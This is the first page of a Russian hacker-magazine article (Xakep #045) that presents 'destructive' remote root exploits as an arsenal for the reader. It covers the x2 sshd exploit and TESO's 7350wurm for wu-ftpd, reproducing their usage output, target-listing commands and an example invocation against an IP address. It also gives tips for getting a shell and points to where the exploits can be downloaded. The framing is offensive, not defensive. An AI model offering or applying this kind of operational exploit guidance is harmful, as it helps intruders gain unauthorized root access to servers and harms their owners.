Самые популярные и разрушительные эксплойты последнего времени!

Ares (ares2000@hotbox.ru)

Xakep, номер #045, стр. 045-046-1

Обычная ситуация: читаешь свежий багтрак, напротив сообщения об очередном переполнении, линк на эксплойт к оному. Эксплойтов существует великое множество, но далеко не каждый имеет такую разрушительную силу (remote/local root access) и огромное количество подверженных уязвимости жертв. Как раз о таких мы и поговорим далее. Кстати, для remote эксплойтов "крутостью" является не обязательно root доступ, а просто возможность получения шелла с любыми правами. Далее они могут быть подняты уже при помощи других локальных эксплойтов. Начнем представлять наш смертельный набор, эксплойт за эксплойтом :)... Скачать их можно с www.xakep.ru.

1. x2. Очень популярный эксплойт к sshd сервису. Одно время был гордостью трейдеров, а уж они чего только не делали: создавали x3 и x4 и т.д., отличавшиеся списком target'ов, добавляли сканер на уязвимые ssh серверы.

[root@www zl0]#./x2

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Usage: sshd-exploit -t# <options> host [port]

Options:

-t num (mandatory) defines target, use 0 for target list

-X string skips certain stages

[root@www zl0]#

Помимо самого бинарника, с ним идет файл targets, содержащий готовый набор offset'ов для различных версий sshd. Их можно легко добавлять самому (принцип добавления можно посмотреть на основе уже готовых офсетов). Просмотреть список доступных target'ов можно по команде:

[root@www zl0]#./x2 -t 0

SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Targets:

( 1) Small - SSH-1.5-1.2.24

( 2) Small - SSH-1.5-1.2.25

( 3) Small - SSH-1.5-1.2.26

...

Example: [root@www zl0]#./x2 -t 1 123.123.123.123

Эксплойт работает только на Linux, хотя ходят слухи, что существует версия, работающая на *BSD системах. Когда будешь его использовать, не обольщайся: он будет работать на любом сервере, но на одном может пройти, а на втором после продолжительного bruteforce'a обломаться.

2. 7350wurm. Удаленный root эксплойт для 34 различных версий wu-ftp демона под разные дистрибутивы Linux. Именно из-за него произошел небольшой скандал между TESO и PacketStormSecurity (после этого был подвержен DDoS атаке, TESO не взял на себя ответственность =)). Дело в том, что этот приватный эксплойт был выложен на сайте пакетсторма, но в нем плюс к этому содержался backdoor.

[root@www zl0]# ./7350wurm

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)

team teso (thx bnuts, tomas, synnergy.net !).

Compiled for MnM 01/12/2001..pr0t!

usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]

[-t <num>] [-u <user>] [-p <pass>] [-d host]

[-L <retloc>] [-A <retaddr>]

[root@www zl0]#

Ключ -a включает автоматический режим, target будет выбран исходя из сервисного баннера, список доступных target'ов можно посмотреть, указав ключ -t 0. Ключи -u & -p используются для указания user/pass при логине к фтп (стандартно анонимное соединение). -v и -D используются для вывода дополнительной информации во время работы эксплойта. Атакуемый сервер указывается после параметра -d.

Содержание  Вперед на стр. 045-046-2

ttfb: 71.502923965454 ms